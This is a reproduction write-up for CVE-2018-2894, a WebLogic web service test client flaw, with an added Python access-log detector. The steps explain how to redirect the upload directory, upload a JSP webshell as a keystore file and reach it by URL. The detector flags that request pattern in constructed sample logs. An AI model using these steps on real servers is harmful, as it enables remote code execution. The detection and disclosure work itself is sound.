CVE-2018-2894 – WebLogic JSP File Upload vulnerability
Oracle WebLogic Server suffers from a trivial file upload vulnerability in its web service test client. Here are the steps to reproduce the vulnerability.
1) Go to http://172.17.0.2:7001/ws_utc/config.do
If you can’t access 172.17.0.2:7001/ws_utc, the web service test client is disabled for your WebLogic server, which is a good thing.
2) Change the Work Home Dir from “/u01/oracle/user_projects/domains/base_domain/tmp/WSTestPageWorkDir” to “/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war”
NOTE: The WebLogic domain home directory will be different for most installations.
For example, in the above case our domain home directory is /u01/oracle/user_projects/domains/base_domain. Another example of a domain home directory is /u01/app/oracle/product/wls/tnt/user_projects/domains/tnt_domain/.
3) Go to Security and add a keystore file. Upload the webshell cmd.jsp as a keystore file and click the Submit button.
4) Intercept the response in Burp and note the ID (1533718460334 in this case) that it returns for the uploaded file.
5) Now access your webshell at http://172.17.0.2:7001/bea_wls_internal/config/keystore/1533718460334_cmd.jsp
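As an added, defender-side example that is not part of the original write-up, the following Python scans HTTP access-log lines for the request pattern the steps above leave behind: a client that reaches /ws_utc/config.do and later requests a .jsp under /bea_wls_internal/config/keystore/. The Common Log Format layout and the sample lines are constructed assumptions, not real WebLogic output.

```python
import re
from typing import Dict, List, Optional

# Request paths from the reproduction above: the web service test client's
# config page, and the directory an uploaded "keystore" (really a JSP) lands in.
WS_UTC_CONFIG = "/ws_utc/config.do"
KEYSTORE_JSP = re.compile(r"^/bea_wls_internal/config/keystore/\d+_[^/]+\.jsp$", re.I)

# Common Log Format as commonly configured for WebLogic's access.log (layout assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: one client walks through the steps, one is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Aug/2018:09:14:01 +0000] "GET /ws_utc/config.do HTTP/1.1" 200 5120
10.0.0.5 - - [08/Aug/2018:09:14:30 +0000] "POST /ws_utc/config.do HTTP/1.1" 200 210
10.0.0.5 - - [08/Aug/2018:09:15:02 +0000] "POST /ws_utc/config.do HTTP/1.1" 200 95
10.0.0.5 - - [08/Aug/2018:09:15:20 +0000] "GET /bea_wls_internal/config/keystore/1533718460334_cmd.jsp HTTP/1.1" 200 88
10.0.0.9 - - [08/Aug/2018:09:16:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3000
""".splitlines()


def classify(line: str) -> Optional[str]:
    """Label one access-log line, or return None if it is not relevant to this CVE."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]  # drop any query string
    if path == WS_UTC_CONFIG:
        # A POST is a settings change or upload (steps 2 and 3); a GET is step 1.
        return "ws_utc_config_change" if m.group("method") == "POST" else "ws_utc_access"
    if KEYSTORE_JSP.match(path):
        return "keystore_jsp_request"  # step 5: a JSP served from the upload directory
    return None


def find_suspects(lines: List[str]) -> Dict[str, List[str]]:
    """Return {client_ip: [events in order]} for clients that both touched the
    test-client config page and requested a .jsp under the keystore upload path."""
    events: Dict[str, List[str]] = {}
    for line in lines:
        kind = classify(line)
        if kind is not None:
            events.setdefault(LOG_RE.match(line).group("ip"), []).append(kind)
    return {ip: ev for ip, ev in events.items()
            if "keystore_jsp_request" in ev and any(e.startswith("ws_utc") for e in ev)}
```

Any hit from find_suspects is worth treating as a likely compromise, and a request to the test-client config page alone is still a sign that ws_utc should be disabled.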